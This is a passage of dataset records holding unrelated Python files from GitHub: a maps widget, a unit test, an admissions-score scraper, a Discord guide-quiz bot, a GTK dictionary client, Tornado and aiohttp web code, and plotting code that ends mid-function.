{\n \"size\": f\"{width}x{height}\",\n \"path\": (\n \"color:0x000000FF|weight:4|enc:\"\n + directions[0][\"overview_polyline\"][\"points\"]\n ),\n \"style\": \"visibility:simplified\",\n }\n\n response = self.client._request(\n url=\"/maps/api/staticmap\", params=arguments, extract_body=lambda r: r\n )\n response.raise_for_status()\n\n if \"X-Staticmap-API-Warning\" in response.headers:\n logger.warn(response.headers[\"X-Staticmap-API-Warning\"])\n\n # Save to cache and return\n self.map_cache[path] = response.content\n\n return self.map_cache[path]\n\n def update(self):\n now = datetime.now()\n\n # Fetch directions\n directions = self.client.directions(\n self.home, self.work, units=self.units, mode=\"driving\", departure_time=now\n )\n\n # Load map\n map = self._fetch_map(directions)\n\n # Save if everything went 
right\n self.map = map\n self.directions = directions\n\n def draw(self, helper):\n time = timedelta(\n seconds=self.directions[0][\"legs\"][0][\"duration_in_traffic\"][\"value\"]\n )\n route = self.directions[0][\"summary\"]\n\n # Display the time\n helper.text(\n (20, self.size[1] - HEADER_SIZE + 3),\n format_timedelta(time, locale=self.locale),\n font=self.fonts[\"time\"],\n fill=helper.BLACK,\n )\n\n # Display the route\n helper.text(\n (20, self.size[1] - HEADER_SIZE + 37),\n route,\n font=self.fonts[\"route\"],\n fill=helper.BLACK,\n )\n\n # Display the image\n helper.img.paste(Image.open(io.BytesIO(self.map)).convert(\"RGB\"), (0, 0))\n","repo_name":"ugomeda/esp32-epaper-display","sub_path":"epaper-server/epaperengine/widgets/googlemaps.py","file_name":"googlemaps.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"3"} +{"seq_id":"24537244528","text":"import unittest\n\nimport torch\n\nfrom autocare_dlt.core.utils import AverageMeter\n\n\nclass TestAverageMeter(unittest.TestCase):\n \"\"\"Compute average for torch.Tensor, used for loss average.\"\"\"\n\n def setUp(self):\n self.n_count = 0\n self.sum = 0\n\n def test_build(self):\n avg = AverageMeter()\n self.assertIsInstance(avg, AverageMeter)\n\n def test_update(self):\n avg = AverageMeter()\n size = 1\n if torch.cuda.is_available():\n pseudo_tensor = torch.cuda.FloatTensor(size).fill_(2)\n else:\n pseudo_tensor = torch.FloatTensor(size).fill_(2)\n avg.update(pseudo_tensor)\n self.assertEqual(avg.sum, 2)\n self.assertEqual(avg.count, 1)\n\n def test_reset(self):\n avg = AverageMeter()\n avg.reset()\n self.assertEqual(avg.sum, 0)\n self.assertEqual(avg.count, 0)\n\n def test_avg(self):\n avg = AverageMeter()\n size = 2\n if torch.cuda.is_available():\n pseudo_tensor = torch.cuda.FloatTensor(size).fill_(5)\n else:\n pseudo_tensor = torch.FloatTensor(size).fill_(5)\n avg.update(pseudo_tensor)\n avg.update(pseudo_tensor)\n result = avg.avg\n\n self.assertEqual(result, 5)\n","repo_name":"snuailab/autocare_dlt","sub_path":"tests/core/utils/test_functions.py","file_name":"test_functions.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"31901926527","text":"import requests\nfrom bs4 import BeautifulSoup\nimport urllib\nfrom urllib.parse import quote, unquote\nimport urllib.request\nimport json\nimport pandas as pd\n\n\ngetListURL=\"http://admin.zhinengdayi.com/front/enroll/getMajorSelectChange?cityName=%E5%8C%97%E4%BA%AC&sCode=NLGYFE\"\nlistRequest=urllib.request.Request(getListURL)\nallList=urllib.request.urlopen(listRequest).read().decode(\"utf-8\")\nlistData=json.loads(allList)\nyearList=listData[\"yearList\"]\nscienceList=listData['scienceList']\ncityList=[\"北京\", \"天津\", '河北','山西','内蒙古',\n '辽宁','吉林','黑龙江','上海','江苏','浙江','安徽',\n '福建','江西','山东', '河南', '湖北','湖南','广西',\n '广东','海南','重庆','四川','贵州','云南','西藏',\n '陕西','甘肃','青海', '宁夏', '新疆']\n\ndef getJSON(city, year, science):\n cityCode=quote(city)\n scienceCode=quote(science)\n response = urllib.request.Request('http://admin.zhinengdayi.com/front/enroll/findMajorScoreCompareList?sCode=NLGYFE&cityName={0}&year={1}&scienceClass={2}&type=%E6%99%AE%E9%80%9A%E6%8B%9B%E7%94%9F&batch='.format(cityCode, year,scienceCode))\n raw = urllib.request.urlopen(response).read().decode(\"utf-8\")\n data=json.loads(raw)\n data=pd.DataFrame(data['list'])\n elementList=[\"majorName\",\"year\",'cityName', 
\"scienceClass\", \"lowScore\"]\n for i in data.columns:\n if i not in elementList:\n del data[i]\n return data\nif __name__== '__main__':\n scoreData=[]\n scoreData=pd.DataFrame(scoreData)\n for i in cityList:\n for j in yearList:\n for k in scienceList:\n scoreData=scoreData.append(getJSON(i,j,k))\n scoreData.rename(columns={\"majorName\":'专业名','year':'年份','cityName':'省市名',\n 'scienceClass':'科类','lowScore':'录取分数线'})\n print(scoreData)\n scoreData.to_csv(\"对外经贸分数线.csv\",index=None)\n","repo_name":"eshoyuan/GaokaoRecommend","sub_path":"crawler/17-19录取分数爬虫/09118117对外经济贸易大学.py","file_name":"09118117对外经济贸易大学.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"} +{"seq_id":"22572185996","text":"def getPermutations(array):\n permutations = []\n # we are going to pass the 'permutations' variable\n # and will update this when we find the new permutation combination\n helper(array, [], permutations)\n return permutations\n\n\ndef helper(array, perm, perms):\n # if nothing in array, append perm to perms \n if len(array) == 0 and len(perm) > 0:\n perms.append(perm)\n # otherwise build combination\n else:\n for idx in range(len(array)):\n # simple way to remove a item in array\n next_array = array[:idx] + array[idx+1:]\n # this is how you add list (append)\n next_perm = perm + [array[idx]]\n # call the helper method with updated variables\n helper(next_array, next_perm, perms)","repo_name":"taigi0315/AlgoExpert","sub_path":"midium_questions/getPermutations.py","file_name":"getPermutations.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19811221182","text":"from logging import exception\nimport discord\nfrom discord.ext import commands\nfrom discord.commands import slash_command\nimport time\nfrom datetime import datetime\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nimport asyncio\nfrom core.common import load_config\nconfig, _ = load_config()\ni = 1\ntime_convert = {\"s\": 1, \"m\": 60, \"h\": 3600, \"d\": 86400}\nimport logging\nlogger = logging.getLogger(__name__)\n\n# -------------------------------------------------------\n\ndef next_available_row(sheet):\n str_list = list(filter(None, sheet.col_values(1)))\n return str(len(str_list)+1)\n\ndef entryid_number(sheet):\n str_list = list(filter(None, sheet.col_values(1)))\n return str(len(str_list)-2)\n\nscope = [\"https://spreadsheets.google.com/feeds\", 'https://www.googleapis.com/auth/spreadsheets',\n \"https://www.googleapis.com/auth/drive.file\", \"https://www.googleapis.com/auth/drive\"]\n\ncreds = ServiceAccountCredentials.from_json_keyfile_name(\"creds.json\", scope)\n\nclient = gspread.authorize(creds)\n\nsheet = client.open(\n \"CCS8 Realm Application\").sheet1\n\n# ---CONSTANTS----------------------------------------------------\n\n\n# -------------------------------------------------------\n\ndef check_Aurafall():\n def predicate(ctx):\n return (\n ctx.message.guild.id == 298995889551310848\n or ctx.message.guild.id == 448488274562908170\n )\n\n return commands.check(predicate)\n\n\ndef check_Coastal():\n def predicate(ctx):\n return (\n ctx.message.guild.id == 305767872410419211\n or ctx.message.guild.id == 448488274562908170\n )\n\n return commands.check(predicate)\n\n\ndef check_Coastal_MRP():\n def predicate(ctx):\n return (\n ctx.message.guild.id == 305767872410419211\n or ctx.message.guild.id == 
448488274562908170\n or ctx.message.guild.id == 587495640502763521\n )\n\n return commands.check(predicate)\n\n\ndef convert(time):\n try:\n return int(time[:-1]) * time_convert[time[-1]]\n except:\n return time\n\n\nclass CoastalGuideCMD(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n logger.info(\"RealmCMD: Cog Loaded!\")\n\n @slash_command(name=\"guide\",\n description=\"Agree to the guide\",\n guild_ids=[config['PBtest'], config['Coastal']])\n async def guide(self, ctx):\n guild = self.bot.get_guild(config['Coastal'])\n print(guild)\n role = guild.get_role(1159549536579096676)\n print(role)\n responsechannel = guild.get_channel(517060711202160640)\n author = ctx.author\n channel = await ctx.author.create_dm()\n\n # Answer Check\n def check(m):\n return m.content is not None and m.channel == channel and m.author is not self.bot.user\n\n embed = discord.Embed(\n title=\"Season 9 Guide Agreement\",\n description=\"Read the guide, and then answer the questions that follow.\",\n color=0x336F75,\n )\n embed.add_field(\n name=\"Online version of the guide\",\n value=\"https://bit.ly/CoastalPlayersGuide9\",\n inline=False,\n )\n embed.add_field(\n name=\"PDF version of the guide\",\n value=\"https://bit.ly/Coastal9PGpdf\",\n inline=False,\n )\n embed.set_thumbnail(\n url=\"https://cdn.discordapp.com/attachments/488792053002534920/1157338182392741999/coastal_logo_final_s9.png\"\n )\n await channel.send(embed=embed)\n await ctx.respond(\"Check your DMs\")\n await asyncio.sleep(5)\n\n question1 = \"What drink do the OPs think is good?\"\n await channel.send(question1)\n await asyncio.sleep(2)\n try:\n answer1 = await self.bot.wait_for('message', timeout=60.0, check=check)\n except asyncio.TimeoutError:\n await channel.send(\n \"I grow tired of waiting, try again later...\")\n else:\n answer1content = str.casefold(answer1.content)\n while True:\n if answer1content != str.casefold(\"cappuccino\"):\n prompt = \"Wrong! Try again: \"\n await channel.send(prompt)\n await asyncio.sleep(2)\n answer1 = await self.bot.wait_for('message', timeout=60.0, check=check)\n answer1content = str.casefold(answer1.content) # refresh before re-checking, otherwise the loop never sees the new answer\n else:\n prompt = \"Great Job!!!\"\n await channel.send(prompt)\n break\n \n question2 = \"Do you agree to the guide? Please answer yes or no.\"\n await channel.send(question2)\n await asyncio.sleep(2)\n try:\n answer2 = await self.bot.wait_for('message', timeout=60.0, check=check) \n except asyncio.TimeoutError:\n await channel.send(\n \"I grow tired of waiting, try again later...\")\n else: \n answer2content = str.casefold(answer2.content) \n if answer2content == str.casefold(\"yes\"):\n prompt = \"Great! 
Have fun Playing Coastal Craft 9: Sakura Shores\"\n await channel.send(prompt)\n await author.add_roles(role)\n await asyncio.sleep(2)\n\n embed = discord.Embed(title=\"Season 9 Guide Agreement\", description=author.name + \" has agreed to the season 9 guide!\", color=0x000800)\n embed.set_thumbnail(url = \"https://cdn.discordapp.com/attachments/488792053002534920/1157338182392741999/coastal_logo_final_s9.png\")\n await responsechannel.send(embed=embed)\n else:\n prompt = \"Please get with an OP to discuss your concerns\"\n await channel.send(prompt)\n\n\n @guide.error\n async def guide_error(self, ctx, error):\n if isinstance(error, commands.MissingRole):\n await ctx.send(\"Uh oh, looks like you don't have the Moderator role!\")\n else:\n raise error\n\ndef setup(bot):\n bot.add_cog(CoastalGuideCMD(bot))\n","repo_name":"bsavage81/TheOldKing","sub_path":"cogs/Coastal_Cogs/CoastalGuide.py","file_name":"CoastalGuide.py","file_ext":"py","file_size_in_byte":6126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35788796297","text":" \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nimport BeautifulSoup\nimport pygtk\npygtk.require(\"2.0\")\nimport gtk\nimport urllib\n\nclass udclient:\n def __init__(self):\n self.filename=\"./interface.glade\"\n self.builder=gtk.Builder()\n self.builder.add_from_file(self.filename)\n \n #getting objects from glade file\n self.win=self.builder.get_object(\"mainwin\")\n self.search=self.builder.get_object(\"search\")\n self.send=self.builder.get_object(\"send\")\n self.scrw=self.builder.get_object(\"scrw\")\n self.result=self.builder.get_object(\"result\")\n\n #main window's settings\n self.win.set_size_request(400,600)\n self.win.connect(\"destroy\",self.destroy)\n self.win.connect(\"key-press-event\",self.keypressed)\n\n #enabling wrap mode\n self.result.set_wrap_mode(gtk.WRAP_WORD)\n\n #connect callbacks\n self.send.connect(\"clicked\",self.respond)\n\n self.result_buffer=self.result.get_buffer()\n\n self.win.set_title(\"Urban Dictionary-Version 1.0\")\n self.win.show_all()\n\n #the callback for main window's destroy event\n def destroy(self,widget):\n gtk.main_quit()\n\n #the callback for keypress event\n def keypressed(self,widget,event):\n if event.keyval==65293:\n self.respond(self.send)\n \n #the function which activates httpreactor function and formats the result into readable form\n def respond(self,widget):\n self.query=self.search.get_text()\n self.query=self.query.replace(\" \",\"+\")\n print(self.query)\n self.response=self.httpreactor(self.query)\n print(self.response)\n self.real_result=\"\"\n count=1\n for each in self.response:\n self.real_result=self.real_result+'\\n'+'Definition: '+str(count)+'\\n'+'\\t'+str(each).replace(\""\",'\"')+'\\n'\n count=count+1\n self.result_buffer.set_text(self.real_result)\n\n #This is the function which will contact Urban Dictionary\n def httpreactor(self,query):\n data=[]\n data_to_server=\"http://www.urbandictionary.com/define.php?term=\"+query\n sock=urllib.urlopen(data_to_server)\n data_received=sock.read()\n sock.close()\n soup=BeautifulSoup.BeautifulSoup(data_received)\n for elm in soup.findAll('div',{'class':'definition'}):\n 
data.append(elm.text)\n #print(elm.text)\n #print(data)\n return data\n\nif __name__ == \"__main__\":\n client=udclient()\n gtk.main()\n","repo_name":"rajat1saxena/UrbanDictionaryClient","sub_path":"udclient/udclient.py","file_name":"udclient.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"18312533337","text":"#!/usr/bin/env python\n#encoding:utf-8\n'''\nAuthor : ming\ndate : 2018-01-12 13:43:27\nrole : customized Application\n'''\nfrom shortuuid import uuid\nfrom tornado import httpserver, ioloop\nfrom tornado import options as tnd_options\nfrom tornado.options import options, define\nfrom tornado.web import Application as tornado_app\nfrom libs.web_logs import Logger, ins_log\n\ndefine(\"addr\", default='0.0.0.0', help=\"run on the given ip address\", type=str)\ndefine(\"port\", default=8000, help=\"run on the given port\", type=int)\ndefine(\"progid\", default=str(uuid()), help=\"tornado progress id\", type=str)\n\n\nclass Application(tornado_app):\n \"\"\" Customized Tornado Application integrating logging, sqlalchemy and other features \"\"\"\n\n def __init__(self, handlers=None, default_host=\"\",\n transforms=None, **settings):\n #print('options.port=>>>',options.port)\n tnd_options.parse_command_line() # parse the command line, e.g. --port=9001\n #print('options.port=>>>',options.port)\n Logger(options.progid)\n # Logger().init_logger(options.progid)\n super(Application, self).__init__(handlers, default_host,\n transforms, **settings)\n http_server = httpserver.HTTPServer(self)\n http_server.listen(options.port, address=options.addr)\n self.io_loop = ioloop.IOLoop.instance()\n\n def start_server(self):\n \"\"\"\n Start the tornado server\n :return:\n \"\"\"\n try:\n ins_log.read_log('info', 'progressid: %(progid)s' % dict(progid=options.progid))\n ins_log.read_log('info', 'server address: %(addr)s:%(port)d' % dict(addr=options.addr, port=options.port))\n ins_log.read_log('info', 'web server started successfully.')\n self.io_loop.start()\n except KeyboardInterrupt:\n self.io_loop.stop()\n except:\n import traceback\n ins_log.read_log('error', '%(tra)s'% dict(tra=traceback.format_exc()))\n #Logger.error(traceback.format_exc())\n\n\nif __name__ == '__main__':\n pass","repo_name":"yangmv/k8sMG","sub_path":"libs/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"3"} +{"seq_id":"10769940285","text":"import logging\n\nimport aiohttp_jinja2\nfrom aiohttp.client_exceptions import ClientConnectionError, ClientConnectorError, ClientResponseError\nfrom aiohttp.web import HTTPFound, RouteTableDef, json_response\nfrom sdc.crypto.encrypter import encrypt\nfrom structlog import wrap_logger\n\nfrom . 
import (\n BAD_CODE_MSG, BAD_CODE_TYPE_MSG, BAD_RESPONSE_MSG, INVALID_CODE_MSG, NOT_AUTHORIZED_MSG, VERSION)\nfrom .case import get_case, post_case_event\nfrom .eq import EqPayloadConstructor\nfrom .exceptions import CompletedCaseError, InvalidIACError, InactiveIACError\nfrom .flash import flash\n\n\nlogger = wrap_logger(logging.getLogger(\"respondent-home\"))\nroutes = RouteTableDef()\n\n\n@routes.view('/info', use_prefix=False)\nclass Info:\n\n @staticmethod\n async def get(request):\n info = {\n \"name\": 'respondent-home-ui',\n \"version\": VERSION,\n }\n if 'check' in request.query:\n info[\"ready\"] = await request.app.check_services()\n return json_response(info)\n\n\n@routes.view('/')\nclass Index:\n\n def __init__(self):\n self.iac = None\n self.request = None\n\n @property\n def client_ip(self):\n if not hasattr(self, '_client_ip'):\n self._client_ip = self.request.headers.get(\"X-Forwarded-For\")\n return self._client_ip\n\n @property\n def iac_url(self):\n return f\"{self.request.app['IAC_URL']}/iacs/{self.iac}\"\n\n @staticmethod\n def join_iac(data, expected_length=12):\n combined = \"\".join([v.lower() for v in data.values()][:3])\n if len(combined) < expected_length:\n raise TypeError\n return combined\n\n @staticmethod\n def get_collex_id(case_json):\n try:\n return case_json['caseGroup']['collectionExerciseId']\n except KeyError:\n logger.warn(\"Failed to get collex_id from case_json['caseGroup']['collectionExerciseId']\")\n\n @staticmethod\n def validate_iac_active(iac_json, case_json):\n if not iac_json.get(\"active\", False):\n collex_id = Index.get_collex_id(case_json)\n\n try:\n if case_json['caseGroup']['caseGroupStatus'] == 'COMPLETE':\n logger.info('Attempt to use inactive iac for completed case', collex_id=collex_id)\n raise CompletedCaseError\n except KeyError:\n logger.warn(\"Field case_json['caseGroup']['caseGroupStatus'] not found\")\n\n logger.info('Attempt to use inactive iac for incomplete case', collex_id=collex_id)\n raise InactiveIACError\n\n def check_case_sample_unit_type_valid(self, case_json):\n try:\n assert case_json['sampleUnitType'] == 'H'\n except AssertionError:\n logger.warn('Attempt to use unexpected sample unit type', sample_unit_type=case_json['sampleUnitType'])\n flash(self.request, BAD_CODE_TYPE_MSG)\n return False\n except KeyError:\n logger.error('sampleUnitType missing from case response', client_ip=self.client_ip)\n flash(self.request, BAD_RESPONSE_MSG)\n return False\n\n return True\n\n def redirect(self):\n raise HTTPFound(self.request.app.router['Index:get'].url_for())\n\n async def get_token(self, case_json):\n eq_payload = await EqPayloadConstructor(case_json, self.request.app, self.iac).build()\n return encrypt(eq_payload, key_store=self.request.app['key_store'], key_purpose=\"authentication\")\n\n async def get_iac_details(self):\n logger.debug(f\"Making GET request to {self.iac_url}\", iac=self.iac, client_ip=self.client_ip)\n try:\n async with self.request.app.http_session_pool.get(self.iac_url, auth=self.request.app[\"IAC_AUTH\"]) as resp:\n logger.debug(\"Received response from IAC\", iac=self.iac, status_code=resp.status)\n\n try:\n resp.raise_for_status()\n except ClientResponseError as ex:\n if resp.status == 404:\n raise InvalidIACError\n elif resp.status in (401, 403):\n logger.info(\"Unauthorized access to IAC service attempted\", client_ip=self.client_ip)\n flash(self.request, NOT_AUTHORIZED_MSG)\n return self.redirect()\n elif 400 <= resp.status < 500:\n logger.warn(\n \"Client error when accessing IAC service\",\n 
client_ip=self.client_ip,\n status=resp.status,\n )\n flash(self.request, BAD_RESPONSE_MSG)\n return self.redirect()\n else:\n logger.error(\"Error in response\", url=resp.url, status_code=resp.status)\n raise ex\n else:\n return await resp.json()\n except (ClientConnectionError, ClientConnectorError) as ex:\n logger.error(\"Client failed to connect to iac service\", client_ip=self.client_ip)\n raise ex\n\n @aiohttp_jinja2.template('index.html')\n async def get(self, _):\n return {}\n\n @aiohttp_jinja2.template('index.html')\n async def post(self, request):\n \"\"\"\n Main entry point to building an eQ payload as URL parameter.\n \"\"\"\n self.request = request\n data = await self.request.post()\n\n try:\n self.iac = self.join_iac(data)\n except TypeError:\n logger.warn(\"Attempt to use a malformed access code\", client_ip=self.client_ip)\n flash(self.request, BAD_CODE_MSG)\n return self.redirect()\n\n try:\n iac_json = await self.get_iac_details()\n except InvalidIACError:\n logger.info(\"Attempt to use an invalid access code\", client_ip=self.client_ip)\n flash(self.request, INVALID_CODE_MSG)\n return aiohttp_jinja2.render_template(\"index.html\", self.request, {}, status=202)\n\n try:\n case_id = iac_json[\"caseId\"]\n except KeyError:\n logger.error('caseId missing from IAC response', client_ip=self.client_ip)\n flash(self.request, BAD_RESPONSE_MSG)\n return {}\n\n case_json = await get_case(case_id, self.request.app)\n\n self.validate_iac_active(iac_json, case_json)\n\n if not self.check_case_sample_unit_type_valid(case_json):\n return {}\n\n token = await self.get_token(case_json)\n\n description = f\"Instrument LMS launched for case {case_id}\"\n await post_case_event(case_id, 'EQ_LAUNCH', description, self.request.app)\n\n logger.info('Redirecting to eQ', client_ip=self.client_ip)\n raise HTTPFound(f\"{self.request.app['EQ_URL']}/session?token={token}\")\n\n\n@routes.view('/cookies-privacy')\nclass CookiesPrivacy:\n @aiohttp_jinja2.template('cookies-privacy.html')\n async def get(self, _):\n return {}\n\n\n@routes.view('/contact-us')\nclass ContactUs:\n @aiohttp_jinja2.template('contact-us.html')\n async def get(self, _):\n return {}\n","repo_name":"ONSdigital/respondent-home-ui","sub_path":"app/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":7129,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"42052681877","text":"if __name__ == \"__main__\":\n print(\"You must call this program from main.py!\")\n choice = input(\"Press ENTER to exit...\")\n from sys import exit\n exit()\n\n### Converts a value from scientific form to two decimal places.\ndef floatFormatting(valueToSquash):\n return \"{:.2f}\".format(valueToSquash)\n\n\n### Iterates over an array to flatten the scientific values to two decimal places.\ndef applyFloatFormat(arrayToIterate):\n listToReturn = []\n for i in range(len(arrayToIterate)):\n listToReturn.append(floatFormatting(arrayToIterate[i]))\n return listToReturn\n\n\n### Generates the figures used. 
Creates the overall figure and then individual figures all of which have the option of\n### being saved.\ndef surfacePlotting(time, wavelength, intensity, logTruncTime, intensPos, refactored):\n\n # Handles plotting before refactoring.\n if refactored == False:\n return 0\n\n from matplotlib import pyplot as plt\n from matplotlib import cm\n import os\n\n # Creates the figure object.\n plt.rc(\"font\", size=11)\n fig = plt.figure(figsize=(10, 8), dpi=100, facecolor=\"white\")\n\n # Creates the general axis objects and adds them to the main figure object.\n ax0 = fig.add_subplot(2, 2, 1)\n ax1 = fig.add_subplot(2, 2, 2)\n ax2 = fig.add_subplot(2, 2, 3)\n ax3 = fig.add_subplot(2, 2, 4)\n\n # Creates the heatmap axis objects.\n ax0Plot = ax0.pcolormesh(wavelength, logTruncTime, intensPos, cmap=cm.jet, vmin=0, vmax=0.035, shading=\"gouraud\", antialiased=True)\n ax1Plot = ax1.pcolormesh(time, wavelength, intensity, cmap=cm.jet, vmin=0, vmax=0.035, shading=\"gouraud\", antialiased=True)\n ax2Plot = ax2.pcolormesh(time, wavelength, intensity, cmap=cm.jet, vmin=0, vmax=0.035, shading=\"gouraud\", antialiased=True)\n ax3Plot = ax3.pcolormesh(time, wavelength, intensity, cmap=cm.jet, vmin=0, vmax=0.035, shading=\"gouraud\", antialiased=True)\n\n # Crops the x-limits for other graphs.\n ax2.set_xlim(0, 5)\n ax3.set_xlim(0, 100)\n\n # Formatting.\n ax0.set_ylabel(\"log(Time Delay) / log(ps)\", fontsize=\"medium\", fontweight=\"bold\")\n ax0.set_xlabel(\"Wavelength / nm\", fontsize=\"medium\", fontweight=\"bold\")\n ax1.set_xlabel(\"Time Delay / ps\", fontsize=\"medium\", fontweight=\"bold\")\n ax1.set_ylabel(\"Wavelength / nm\", fontsize=\"medium\", fontweight=\"bold\")\n ax2.set_xlabel(\"Time Delay / ps\", fontsize=\"medium\", fontweight=\"bold\")\n ax2.set_ylabel(\"Wavelength / nm\", fontsize=\"medium\", fontweight=\"bold\")\n ax3.set_xlabel(\"Time Delay / ps\", fontsize=\"medium\", fontweight=\"bold\")\n ax3.set_ylabel(\"Wavelength / nm\", fontsize=\"medium\", fontweight=\"bold\")\n fig.colorbar(ax0Plot, ax=ax0)\n fig.colorbar(ax1Plot, ax=ax1)\n fig.colorbar(ax2Plot, ax=ax2)\n fig.colorbar(ax3Plot, ax=ax3)\n fig.tight_layout(h_pad=2.0, w_pad=3.0)\n\n # Allows program execution whilst figure displays.\n print(\"Drawing plot...\")\n plt.show(block=False)\n\n # Halts program execution.\n input(\"\\n>>> Press ENTER to resume program...\")\n \n # Gives user the option to save the figure.\n saveFig = str(input(\"\\n>>> Do you want to save this figure? 
(y/n): \"))\n while True:\n if saveFig.lower() == \"y\":\n\n # Saves the main figure.\n fileName = str(input(\"\\n>>> Enter a filename: \"))\n fileNamePath = str(os.getcwd() + \"\\\\savedSurfacePlots\\\\\" + fileName + \".png\")\n plt.savefig(fileNamePath, format=\"png\")\n\n # Generates the first individual figure and saves it.\n plt.rc(\"font\", size=14)\n tempFig1 = plt.figure(figsize=(8, 8), tight_layout=True)\n tempAx1 = tempFig1.add_subplot(1, 1, 1)\n tempAx1Plot = tempAx1.pcolormesh(wavelength, logTruncTime, intensPos, cmap=cm.jet, vmin=0, vmax=0.035, shading=\"gouraud\", antialiased=True)\n\n # More formatting.\n tempAx1.set_ylabel(\"log(Time Delay) / log(ps)\", fontsize=\"medium\", fontweight=\"bold\")\n tempAx1.set_xlabel(\"Wavelength / nm\", fontsize=\"medium\", fontweight=\"bold\")\n tempFig1.colorbar(tempAx1Plot, ax=tempAx1)\n plt.savefig(str(os.getcwd() + \"\\\\savedSurfacePlots\\\\\" + fileName + str(\"_individual_\" + str(1)) + \".png\"), format=\"png\")\n plt.close(tempFig1)\n\n for i in range(3):\n\n # Generates the remaining individual cropped figures.\n tempFig2 = plt.figure(figsize=(8, 8), tight_layout=True)\n tempAx2 = tempFig2.add_subplot(1, 1, 1)\n tempAx2Plot = tempAx2.pcolormesh(time, wavelength, intensity, cmap=cm.jet, vmin=0, vmax=0.035, shading=\"gouraud\", antialiased=True)\n\n # Defines the limits for the cropped figures.\n if i == 1:\n tempAx2.set_xlim(0, 5)\n\n elif i == 2:\n tempAx2.set_xlim(0, 100)\n\n # Even More formatting.\n tempAx2.set_xlabel(\"Time Delay / ps\", fontsize=\"medium\", fontweight=\"bold\")\n tempAx2.set_ylabel(\"Wavelength / nm\", fontsize=\"medium\", fontweight=\"bold\")\n tempFig2.colorbar(tempAx2Plot, ax=tempAx2)\n\n # Saves the remaining cropped figures.\n plt.savefig(str(os.getcwd() + \"\\\\savedSurfacePlots\\\\\" + fileName + str(\"_individual_\" + str(i + 2)) + \".png\"), format=\"png\")\n plt.close(tempFig2)\n\n # Closes the final figure object\n plt.close(fig)\n break\n\n elif saveFig.lower() ==\"n\":\n plt.close(fig)\n break\n \n else:\n saveFig = str(input(\"\\n>>> I'm sorry, I didn't catch that. Do you want to save this figure? (y/n): \"))\n\n # Halts program execution.\n input(\"\\n>>> Press ENTER to resume program...\")\n\n return 1\n\n\n### Plots all of the data from the desired file. This plot will be generated and displayed to\n### the user but is not saved.\ndef plotSingleDataset(datasetChoice, directoryFiles, saveDialog=True, definedWavelengths=None, colormap=\"Spectral_r\"):\n\n ### Tries to convert the dataset chosen to an integer type. If this fails then we return 0.\n try:\n datasetChoice = int(datasetChoice)\n \n except TypeError:\n return 0\n \n else:\n from os import getcwd\n from pandas import read_csv\n from matplotlib import pyplot as plt\n from seaborn import heatmap, color_palette\n from numpy import genfromtxt, delete\n \n ### Sets the file paths\n path = str(getcwd() + \"\\\\refactoredDataFiles\\\\\" + directoryFiles[datasetChoice-1])\n rawPath = str(getcwd() + \"\\\\rawDataFiles\\\\\" + directoryFiles[datasetChoice-1][:-4] + \".txt\")\n\n ### Loads the data as a 2D NumPy array.\n array = genfromtxt(rawPath)\n\n ### Generating the array used as the actual Pandas df index.\n wavelength = delete(array[:,0], 0)\n time = delete(array[0,:], 0)\n\n ### Convert the axis lists into readable float types\n wavelengthFloat = applyFloatFormat(wavelength)\n timeFloat = applyFloatFormat(time)\n\n ### Tries to loadt the requested DataFrame. 
If this fails, then the function returns 0.\n try: \n df = read_csv(path, header=0, index_col=0) \n except FileNotFoundError:\n print(\"The requested file was not accessible, please try another file.\")\n return 0\n\n ### Constructs the figure space and creates the two axes object for plotting.\n fig = plt.figure(figsize=(15,6), frameon=True, facecolor=\"white\")\n ax0 = fig.add_subplot(1, 2, 1)\n ax1 = fig.add_subplot(1, 2, 2)\n \n ### Generates the heatmap for the data using the requested Seaborn colormap.\n heatmap(df, cmap=color_palette(colormap, as_cmap=True), ax=ax0)\n\n ### Sets the ticks and tick labels to the more readable float formats for the heatmap.\n ax0.set_xlabel(\"Time / s\", fontsize=\"medium\", fontweight=\"bold\")\n ax0.set_ylabel(\"Wavelength / nm\", fontsize=\"medium\", fontweight=\"bold\")\n ax0.set_xticks([x for x in range(0, len(timeFloat), 7)])\n ax0.set_yticks([x for x in range(0, len(wavelengthFloat), 19)])\n ax0.set_xticklabels([timeFloat[x] for x in range(0, len(timeFloat), 7)])\n ax0.set_yticklabels([wavelengthFloat[x] for x in range(0, len(wavelengthFloat), 19)])\n\n ### Extracts each intensity value at a certain wavelength for the duration of the experiment\n ### to a list. Each list is then stored in a bigger list of values.\n intensityValues = df.values.tolist()\n\n if definedWavelengths is None:\n ### Selects a sample of the intensityValues using the plottingValues list. This will select\n ### 6 wavelengths to display (regularly spaced intervals).\n plottingValues = [x for x in range(0, len(wavelength), (len(wavelength)//6))]\n\n ### Defines the plotting variables for the sample graph.\n ax1.plot(time, intensityValues[plottingValues[0]], '-r',\n time, intensityValues[plottingValues[1]], '-y',\n time, intensityValues[plottingValues[2]], '-g',\n time, intensityValues[plottingValues[3]], '-c',\n time, intensityValues[plottingValues[4]], '-b',\n time, intensityValues[plottingValues[5]], '-m')\n \n elif definedWavelengths is not None:\n ### Uses the defined wavelengths for plotting. Searches the raw wavelength array for the wavelengths\n ### specified and returns the indices for these positions.\n 